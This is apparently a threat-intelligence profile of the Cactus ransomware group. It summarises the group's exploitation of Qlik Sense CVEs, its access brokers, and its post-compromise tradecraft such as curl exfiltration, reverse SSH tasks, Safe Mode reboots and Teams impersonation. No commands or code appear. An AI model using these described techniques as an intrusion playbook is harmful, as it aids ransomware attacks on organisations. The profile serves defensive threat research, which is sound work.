CACTUS

Cactus is a financially motivated ransomware group active since at least March 2023 and associated with double-extortion and big-game-hunting operations. The group is referred to as the “Cactus Group” and operates a data leak site called “Cactus Blog.” Reporting in the provided content links Cactus to worldwide ransomware activity and to the broader ransomware affiliate ecosystem, including overlap or migration involving former Black Basta affiliates and actors tracked as Blitz Brigantine, which has been described as an affiliate for both Black Basta and Cactus operations. Cactus has been observed using multiple initial access methods. Since at least November 2023, it has actively targeted vulnerable internet-facing Qlik Sense servers for initial access, including exploitation associated with CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365. Joint research cited in the content identified numerous vulnerable and likely compromised Qlik Sense servers globally, including Dutch victims. Separate reporting also states that Cactus received access from the financially motivated initial access group ToyMaker, which Talos says previously handed access to Maze, Egregor, and Cactus. Post-compromise, Cactus has been observed conducting endpoint, server, and file enumeration; using a PowerShell WSMAN discovery script; archiving data with 7z; and exfiltrating data with curl and other transfer tools. Talos reported that Cactus likely exfiltrated customer data, deleted command history and other artifacts, removed the earlier-created “support” account, deployed remote administration tools including eHorus Agent, AnyDesk, RMS Remote Admin, and OpenSSH, and created scheduled tasks for recurring OpenSSH reverse shell access over port 443. The group also created unauthorized accounts such as “whiteninja,” modified Winlogon registry keys, and used bcdedit and shutdown commands to reboot hosts into Safe Mode, likely to weaken security controls before ransomware deployment. The content also describes Cactus intrusions using social engineering tradecraft associated with Microsoft Teams impersonation and Quick Assist abuse. Trend Micro reported a Cactus case in which attackers contacted the victim via Teams, delivered split .bpx payloads that were reassembled into a ZIP archive, and abused OneDriveStandaloneUpdater.exe for DLL sideloading to deploy BackConnect malware. In that case, Cactus used the same BackConnect command-and-control infrastructure seen in Black Basta-related activity, moved laterally with SMB and WinRM, compromised ESXi hosts, deployed socks.out assessed as likely SystemBC, used WinSCP, and sent a ransom note by email identifying themselves as the Cactus Group. Cactus has also been associated in the provided content with abuse of legitimate remote access and administration software, including AnyDesk and Splashtop, and with use of Restart Manager (RstrtMgr.dll) to terminate interfering processes. Additional reporting notes a newer Cactus ransomware variant demonstrating advanced command and scripting techniques. The content does not attribute Cactus to a nation state. It consistently describes the group as part of the criminal ransomware ecosystem, including affiliate migration and rebranding dynamics involving Black Basta and other ransomware operations.